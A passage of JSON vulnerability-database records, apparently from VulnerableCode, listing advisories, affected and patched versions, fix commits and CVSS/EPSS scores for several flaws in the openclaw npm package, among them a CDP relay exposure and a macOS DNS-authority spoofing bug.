ormat=json","vulnerability_id":"VCID-fuda-zxu8-gbb4","summary":"OpenClaw: Sandbox browser CDP relay could expose DevTools protocol on 0.0.0.0\n## Summary\n\nSandbox browser CDP relay could expose DevTools protocol on 0.0.0.0.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe sandbox browser CDP relay could bind too broadly, exposing Chrome DevTools Protocol access outside the intended local/sandbox source range.\n\n## Technical Details\n\nThe fix enforces CDP source-range restriction by default and avoids broad `0.0.0.0` exposure unless explicitly configured.\n\n## Fix\n\nThe issue was fixed in #61404. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `fbf11ebdb7110632f93926d0ac7b48f04cb44d77`\n- PR: #61404\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/fbf11ebdb7110632f93926d0ac7b48f04cb44d77"},{"reference_url":"https://github.com/openclaw/openclaw/pull/61404","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/61404"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-525j-hqq2-66r4"},{"reference_url":"https://github.com/advisories/GHSA-525j-hqq2-66r4","reference_id":"GHSA-525j-hqq2-66r4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-525j-hqq2-66r4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["GHSA-525j-hqq2-66r4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fuda-zxu8-gbb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89900?format=json","vulnerability_id":"VCID-g3hg-peh1-tudm","summary":"OpenClaw: macOS Tailnet DNS Spoofing & Credential Exfiltration\n## Summary\nmacOS Wide-Area Discovery Accepts Arbitrary Tailnet Peer as DNS Authority and Exfiltrates Operator Credentials\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped macOS discovery steering bug, but exploitation needs same-tailnet position, a CA-trusted endpoint, and user selection, so medium not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a23c33a681f8c1b22dc793995acc4c5c4b568346` — 2026-03-31T10:04:11+01:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41393","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.0069","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41393"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a23c33a681f8c1b22dc793995acc4c5c4b568346"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-q9w8-cf67-r238"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41393","reference_id":"CVE-2026-41393","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41393"},{"reference_url":"https://github.com/advisories/GHSA-q9w8-cf67-r238","reference_id":"GHSA-q9w8-cf67-r238","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q9w8-cf67-r238"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery","reference_id":"openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:50:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-dns-authority-acceptance-and-credential-exfiltration-via-wide-area-discovery"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41393","GHSA-q9w8-cf67-r238"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g3hg-peh1-tudm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89500?format=json","vulnerability_id":"VCID-g8r6-x6s5-uydq","summary":"OpenClaw: Telegram audio preflight transcription enables resource consumption by unauthorized senders\n## Summary\nTelegram audio preflight transcription enables resource consumption by unauthorized senders\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still lets unauthorized Telegram group senders trigger audio preflight before allowlist enforcement, but the real impact is resource or billing burn rather than direct data exposure or host compromise.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c4fa8635d03943ffe9e294d501089521dca635c5` — 2026-03-30T12:19:31+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41331","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.1772","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17683","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17714","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41331"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41331","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41331"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription"},{"reference_url":"https://github.com/advisories/GHSA-m6fx-m8hc-572m","reference_id":"GHSA-m6fx-m8hc-572m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m6fx-m8hc-572m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41331","GHSA-m6fx-m8hc-572m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g8r6-x6s5-uydq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91271?format=json","vulnerability_id":"VCID-g9jn-c2rf-byem","summary":"Duplicate Advisory: OpenClaw's MS Teams sender allowlist bypass when route allowlist is configured and sender allowlist is empty\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-g7cr-9h7q-4qxq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.8 contains a sender allowlist bypass vulnerability in its Microsoft Teams plugin that allows unauthorized senders to bypass intended authorization checks. When a team/channel route allowlist is configured with an empty groupAllowFrom parameter, the message handler synthesizes wildcard sender authorization, permitting any sender in the matched team/channel to trigger replies in allowlisted Teams 